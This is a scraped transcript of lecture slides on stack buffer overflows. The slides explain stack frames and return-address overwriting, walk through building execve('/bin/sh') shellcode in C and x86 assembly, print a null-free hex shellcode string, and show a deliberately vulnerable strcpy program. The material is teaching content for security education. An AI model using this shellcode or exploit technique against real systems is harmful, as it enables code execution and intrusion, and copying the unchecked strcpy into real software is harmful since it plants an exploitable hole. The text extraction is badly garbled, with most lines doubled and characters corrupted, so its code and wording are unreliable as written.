Buffer_Overflow

8/7/2019 Buffer_Overflow

http://slidepdf.com/reader/full/bufferoverflow 1/24

Buffer OverflowBuffer OverflowByBy MahtabMahtab ALamALam



Stack Buffer Overflow BasicsStack Buffer Overflow Basics A process in memory:A process in memory:

-- text (Program code; markedtext (Program code; markedreadread--only, so any attempts toonly, so any attempts towrite to it will result inwrite to it will result in

segmentation fault)segmentation fault)-- data segment (Global anddata segment (Global andstatic variables)static variables)

-- stack (Dynamic variables)stack (Dynamic variables)

The process is blocked and isThe process is blocked and isrescheduled to run again with arescheduled to run again with alarger memory space if the userlarger memory space if the userattack exhausts available memory.attack exhausts available memory.

Lowermemoryaddresses

Highermemoryaddresses



Stack BasicsStack Basics

A stack is contiguous block of memory containingA stack is contiguous block of memory containingdata.data.

Stack pointer (SP)Stack pointer (SP) ±± a register that points to thea register that points to the

top of the stack.top of the stack. The bottom of the stack is at fixed address.The bottom of the stack is at fixed address.

Its size is dynamically adjusted by kernel at runIts size is dynamically adjusted by kernel at runtime.time.

CPU implements instructions to PUSH onto andCPU implements instructions to PUSH onto andPOP off the stack.POP off the stack.



Stack BasicsStack Basics

A stack consists of logical stackA stack consists of logical stackframes that are pushed whenframes that are pushed whencalling a function and popped whencalling a function and popped whenreturning.returning. Frame pointer (FP)Frame pointer (FP) ±± points to apoints to afixed location within a frame.fixed location within a frame.

When a function is called, theWhen a function is called, thereturn address, stack frame pointerreturn address, stack frame pointerand the variables are pushed onand the variables are pushed onthe stack (in that order).the stack (in that order).

So the return address has a higherSo the return address has a higheraddress as the buffer.address as the buffer.

When we overflow the buffer, theWhen we overflow the buffer, thereturn address will be overwritten.return address will be overwritten.

High memoryaddresses

Lower memoryaddresses



void function(){void function(){

««

return;return;

}}

void main(){void main(){

....

Function();Function();....

}}



Another Example CodeAnother Example Code

void function(int a, int b, int c) {void function(int a, int b, int c) {

char buffer1[5];char buffer1[5];

char buffer2[10];char buffer2[10];}}

void main(){void main(){

function(1,2,3);function(1,2,3);

}}



Stack layout f or the example codeStack layout f or the example code

bottom of bottom of top of top of

memorymemory memorymemory

buffer2buffer2 buffer1 sfp ret a b cbuffer1 sfp ret a b c

<<------------ [ ][ ][ ][ ][ ][ ][ ][ ][ ][ ][ ][ ][ ][ ]

Top of stackTop of stack bottom of bottom of stackstack



General Form of Security Attack Achieves Two Goals:General Form of Security Attack Achieves Two Goals:

1. Inject the attack code, which is typically a small1. Inject the attack code, which is typically a small

sequence of instr uctions that spawns a shell, into sequence of instr uctions that spawns a shell, into

a r unning pr ocess.a r unning pr ocess.

2. Change the execution path of the r unning 2. Change the execution path of the r unning

pr ocess to execute the attack code.pr ocess to execute the attack code.

Overflowing stack buffers can achieve bothOverflowing stack buffers can achieve bothgoals simultaneously.goals simultaneously.



How can we place arbitraryHow can we place arbitrary

instr uction into its address space?instr uction into its address space?

--place the code that you are trying toplace the code that you are trying toexecute in the buffer we areexecute in the buffer we areoverflowing, and overwrite the returnoverflowing, and overwrite the returnaddress so it points back into theaddress so it points back into the

buffer.buffer.



bottom of bottom of top of top of

memorymemory memorymemory

DDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFFDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF

89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF

bufferbuffer sfp ret a b csfp ret a b c<<-------- [SSSSSSSSSSSSSSSSSSS] [SSSS][0xD8][0x01][0x02][0x03][SSSSSSSSSSSSSSSSSSS] [SSSS][0xD8][0x01][0x02][0x03]

^̂ ||

|____________________________||____________________________|

top of top of bottom of bottom of

stackstack stackstack

We want:We want:



(i) Before the attack (ii) after injecting the attack code



(iii) executing the attack code



Shellcode.cShellcode.c

#include<stdio.h>#include<stdio.h>

void main() {void main() {

char *name[2];char *name[2];name[0] = "/bin/sh";name[0] = "/bin/sh";

name[1] = NULL;name[1] = NULL;

execve(name[0], name, NULL);execve(name[0], name, NULL);}}



After compiling the code and starting up gdb, weAfter compiling the code and starting up gdb, we

have the shellcode in assembly:have the shellcode in assembly:



Some modifications to the shellcode:Some modifications to the shellcode:

We want the program to exit cleanly if the execveWe want the program to exit cleanly if the execvesyscall fails. We add exit(0); as the last line in thesyscall fails. We add exit(0); as the last line in the

code.code.



Our list of steps:Our list of steps:

Have the null terminated stringHave the null terminated string"/bin/sh" somewhere in memory."/bin/sh" somewhere in memory. Have the address of the stringHave the address of the string

"/bin/sh" somewhere in memory"/bin/sh" somewhere in memoryfollowed by a null long word.followed by a null long word.

Copy 0xb into the EAX register.Copy 0xb into the EAX register. Copy the address of the address of Copy the address of the address of

the string "/bin/sh" into the EBX the string "/bin/sh" into the EBX register.register.

Copy the address of the stringCopy the address of the string"/bin/sh" into the ECX register."/bin/sh" into the ECX register.

Copy the address of the null longCopy the address of the null longword into the EDX register.word into the EDX register.

Execute the int $0x80 instruction.Execute the int $0x80 instruction. Copy 0x1 into the EAX register.Copy 0x1 into the EAX register. Copy 0x0 into the EBX register.Copy 0x0 into the EBX register. Execute the int $0x80 instruction.Execute the int $0x80 instruction.

Trying to put this together inTrying to put this together inAssembly languageAssembly language, we have:, we have:

movl string_addr,string_addr_addrmovl string_addr,string_addr_addrmovb $0x0,null_byte_addrmovb $0x0,null_byte_addrmovl $0x0,null_addrmovl $0x0,null_addrmovl $0xb,%eaxmovl $0xb,%eax

movl string_addr,%ebxmovl string_addr,%ebxleal string_addr,%ecxleal string_addr,%ecxleal null_string,%edxleal null_string,%edxint $0x80int $0x80movl $0x1, %eaxmovl $0x1, %eaxmovl $0x0, %ebxmovl $0x0, %ebx

int $0x80int $0x80/bin/sh string goes here./bin/sh string goes here.

Then, place the string afterthe code.



r oblem:Pr oblem:

we don¶t know where in the memory space of the pr ogramwe don¶t know where in the memory space of the pr ogram

we¶re trying to exploit the code (the string that f ollows it) willwe¶re trying to exploit the code (the string that f ollows it) willbe placed.be placed.

Solution:Solution:

----Place a CALL instruction right before thePlace a CALL instruction right before the³/bin/sh´ string, and a JMP instruction to³/bin/sh´ string, and a JMP instruction to

it.it.

----the string¶s address will be pushed ontothe string¶s address will be pushed onto

the stack as the return when CALL isthe stack as the return when CALL isexecuted. (Basically, CALL instructionexecuted. (Basically, CALL instructionpushes the IP onto the stack)pushes the IP onto the stack)



Inserting JMP and CALL instructionsInserting JMP and CALL instructions

bottom of bottom of top of top of memorymemory memorymemory

DDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFFDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF

89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF

bufferbuffer sfp ret a b csfp ret a b c

<<------[JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03][JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]^|^^|^ ^| |^| |

|||_______________| |__________| (1)|||_______________| |__________| (1)

(2)(2) ||_______________| |||_______________| |

|_________________| (3)|_________________| (3)

top of stacktop of stack bottom of stackbottom of stack



Running the shellcodeRunning the shellcode

We must place the code we wish toWe must place the code we wish toexecute in the stack or data segment.execute in the stack or data segment.

(Recall: text region of a process is(Recall: text region of a process is

marked readmarked read--only)only)

To do so, we¶ll place our code in a globalTo do so, we¶ll place our code in a global

array in the data segment. We need hexarray in the data segment. We need hexrepresentation of the binary code.representation of the binary code.



shellcodeasm.cshellcodeasm.c



Obstacle: There must be no null bytes in the shellcode f or the exploitObstacle: There must be no null bytes in the shellcode f or the exploit

to work.to work.

Reason: null bytes in our shellcode will be considered the end of theReason: null bytes in our shellcode will be considered the end of the

string the copy will be terminated when encountering the nullstring the copy will be terminated when encountering the nullcharacter.character.

After eliminating null bytes, shellcode in H

ex representation (Note:After eliminating null bytes, shellcode in H

ex representation (Note:different har dware architecture has different Hex. Representation of different har dware architecture has different Hex. Representation of

binary code):binary code):

char shellcode[] =char shellcode[] =""\ \xebxeb\ \x1f x1f\ \x5ex5e\ \x89x89\ \x76x76\ \x08x08\ \x31x31\ \xc0xc0\ \x88x88\ \x46x46\ \x07x07\ \x89x89\ \x46x46

\ \x0cx0c\ \xb0xb0\ \x0b"x0b"""\ \x89x89\ \xf3xf3\ \x8dx8d\ \x4ex4e\ \x08x08\ \x8dx8d\ \x56x56\ \x0cx0c\ \xcdxcd\ \x80x80\ \x31x31\ \xdbxdb\ \x89x89

\ \xd8xd8\ \x40x40\ \xcd" "xcd" "\ \x80x80\ \xe8xe8\ \xdcxdc\ \xff xff\ \xff xff\ \xff/bin/sh";xff/bin/sh";



vulnerable.cvulnerable.c

void main(int argc, char *argv[]) {void main(int argc, char *argv[]) {

char buffer[512];char buffer[512];

if (argc > 1)if (argc > 1)strcpy(buffer,argv[1]);strcpy(buffer,argv[1]);

}}



The EndThe End

Buffer_Overflow

Documents

Transcript of Buffer_Overflow